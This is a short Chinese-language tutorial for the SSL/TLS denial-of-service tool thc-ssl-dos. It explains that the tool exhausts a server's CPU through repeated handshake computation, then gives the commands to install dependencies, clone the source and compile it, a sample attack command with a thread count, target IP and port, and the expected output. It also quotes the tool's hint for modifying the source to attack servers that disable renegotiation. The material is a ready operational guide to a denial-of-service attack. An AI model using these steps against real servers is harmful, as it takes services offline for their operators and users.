0x1 thc-ssl-dos
- 这是一个针对ssl的dos攻击工具
- 本质上是通过触发服务端的
RSA_encrypt来耗尽计算资源 - 源码托管于githubthc-tls-dos
0x2 安装
- 这个工具没有被主流包管理器支援,需要自己编译安装
首先安装编译需要的依赖
apt install -y git build-essential # 软件需要的特殊依赖 apt install -y libssl-dev接着下载源码
git clone https://github.com/azet/thc-tls-dos最后编译安装
cd thc-tls-dos/ ./configure make- 最后编译出来的程序
thc-ssl-dos在/thc-tls-dos/src目录下 程序展开后是这样的
# ./thc-ssl-dos -h ______________ ___ _________ \__ ___/ | \ \_ ___ \ | | / ~ \/ \ \/ | | \ Y /\ \____ |____| \___|_ / \______ / \/ \/ http://www.thc.org Twitter @hackerschoice Greetingz: the french underground ./thc-ssl-dos [options] <ip> <port> -h help -l <n> Limit parallel connections [default: 400]
0x3 使用案例
thc-ssl-dos的参数格式如下thc-ssl-dos -l [攻击线程] [目标ip地址] [端口] --accept典型使用案例如下
thc-ssl-dos -l 500 10.25.153.203 443 --accept如果攻击正常开始,那么会获得如下输出
./thc-ssl-dos -l 500 111.168.1.208 443 --accept ______________ ___ _________ \__ ___/ | \ \_ ___ \ | | / ~ \/ \ \/ | | \ Y /\ \____ |____| \___|_ / \______ / \/ \/ http://www.thc.org Twitter @hackerschoice Greetingz: the french underground Handshakes 0 [0.00 h/s], 1 Conn, 0 Err Handshakes 0 [0.00 h/s], 500 Conn, 0 Err如果目标服务器不存在该漏洞那么会出现如下错误信息
./thc-ssl-dos -l 500 10.25.153.203 443 --accept ______________ ___ _________ \__ ___/ | \ \_ ___ \ | | / ~ \/ \ \/ | | \ Y /\ \____ |____| \___|_ / \______ / \/ \/ http://www.thc.org Twitter @hackerschoice Greetingz: the french underground Handshakes 0 [0.00 h/s], 1 Conn, 0 Err Secure Renegotiation support: yes ERROR: Target has disabled renegotiations. Use your own skills to modify the source to test/attack the target [hint: TCP reconnect for every handshake].